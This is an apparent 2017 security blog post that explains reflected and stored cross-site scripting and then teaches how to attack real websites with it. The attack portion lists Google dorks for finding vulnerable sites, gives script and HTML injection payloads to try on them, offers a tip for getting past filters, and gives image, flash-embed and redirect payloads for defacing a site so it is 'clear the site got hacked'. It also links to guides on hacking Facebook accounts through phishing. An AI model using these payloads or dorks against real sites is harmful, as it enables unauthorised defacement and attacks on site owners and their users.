Saturday , September 23 2017
Home / Cyber News / Hack with Cross Site Scripting (XSS)
Cross Site Scripting
The swindler steals data

Hack with Cross Site Scripting (XSS)

Before hacking with Cross Site Scripting (XSS), lets first learn about what is XSS?

What is XSS?

Inserting malicious client side script into the web applications, and retrieving the scripts appearing to be coming from a trusted source (server) is termed as cross site scripting. XSS differs from other web attack vectors (e.g., SQL injections), in that it does not directly target the application itself. Instead, the users of the web application are the ones at risk.

Cross site scripting (XSS) is a type of computer security vulnerability which is typically found in Web applications, such as web browsers through breaches found in browser security, that enables attackers to inject client-side script into Web pages viewed by other users.

Types of XSS

  1. Reflected XSS (Non-Persistent)
  2. Stored XSS (Persistent)
  3. DOM XSS

Let’s get the meaning of shown XSS types one by one in brief description.

1- Reflected XSS (Non-Persistent)

The non-persistent XSS are actually the most common vulnerabilities that can be found on the internet ironically everywhere. It is named as “non-persistent” because it works on an immediate HTTP response from the victim website, it show up when the webpage get the data provided by the attacker’s client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user’s browser. The script is embedded into a link, and is only activated once that link is clicked on.

The most common applying of this kind of vulnerability is in Search engines in website. The attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

 

Stored XSS (Persistent)

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw, it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping.

Persistent XSS is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.

 

To successfully execute a stored XSS attack, a perpetrator has to locate a vulnerability in a web application and then inject malicious script into its server (e.g., via a comment field).

sorted-XSS

Are you interested to learn how to hack Facebook account through phishing attacks then, click here.

Google Dorks:

inurl:”.php?cmd=”
inurl:”.php?z=”
inurl:”.php?q=”
inurl:”.php?search=”
inurl:”.php?query=”
inurl:”.php?searchstring=”
inurl:”.php?keyword=”
inurl:”.php?file=”
inurl:”.php?years=”
inurl:”.php?txt=”
inurl:”.php?tag=”
inurl:”.php?max=”
inurl:”.php?from=”
inurl:”.php?author=”
inurl:”.php?pass=”
inurl:”.php?feedback=”
inurl:”.php?mail=”
inurl:”.php?cat=”
inurl:”.php?vote=”
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=

These are some basic dorks but you can make your own custom dorks to find websites.

Using such dorks you can easily find which sites are vulnerable to XSS so you can bypass the filtration.

Basics of XSS:
To start the learning step by step lets get hands dirty by some actual methods, the most common used XSS
injection is :
<script>alert(“Kamran”)</script>
This will alert a popup message, saying “Kamran” without quotes. So,use “search.php?q=” and you can simple try the following on a websi
http://website.com/search.php?q=<script>alert(“Kamran”)</script>

There are chances to get first attempt on XSS vulnerable websites without being failed but chances could go wrong so don’t worry and try some other websites.

Most of the cases occur when java script does not work so use HTML tags e.g
http://website.com/search.php?q=<br><br><b><u>kamran</u></b>
In such case if you see the bold text on the page and newlines then you know its vulnerable and could easily be exploited.

When you enter the java script command or HTML tag you can witness whether the site is vulnerable or not. When you enter <h1>TEST</h1> in search bars or in any available bar and the page in return display the TEST so the site is vulnerable.

Replace the word XSS in java script tag with anyother name because most of the sites catch the word XSS.

Hack Facebook or other social mdia account through Base64 Encoding then, click here.

How to deface website with XSS?

To this point I hope you people have got enough information about XSS and how it works.

Lets use some tricks to deface the site after finding that the site is vulnerable at all. Well there are many methods to deface the site, here I’m giving you a demo in which I’m using <img> tag of html. The image tag is used for displaying image on the website.

For example:

<html>

<body>

<IMG SRC=”http://website.com/image.png”>

</body>

</html>

Now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a comment box, search bar or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC=”http://scriptphp.net/wp-content/uploads/2016/04/PHP-Search-engine-script.jpg”>

The other tags are not needed has the page will already have them. Ok it helps to
make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.

<EMBED SRC=”http://site.com/xss.swf” >

That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( “http://www.xyz.com/” )</script>

Beside this there are many others ways that you can found using Google. My work was to give you the basic concept to make you understand what all about XSS is.

Lets find the network vulnerabilities through which you might get hacked, click here.


Your comments would be highly appreciated.

About Kamran Mohsin

Kamran Mohsin
I'm a software engineer by profession, a passionate and experienced web designer, developer and blogger. I use to work with programming languages on daily basis and works to get something new into my knowledge prior to what I had before. I write blogs about information security, WordPress, various ways to make money and more.

Check Also

Blue Whale

Reality Behind The “Blue Whale”, The Suicide Game

Reality Behind The “Blue Whale”, The Suicide Game. For the past few days there has …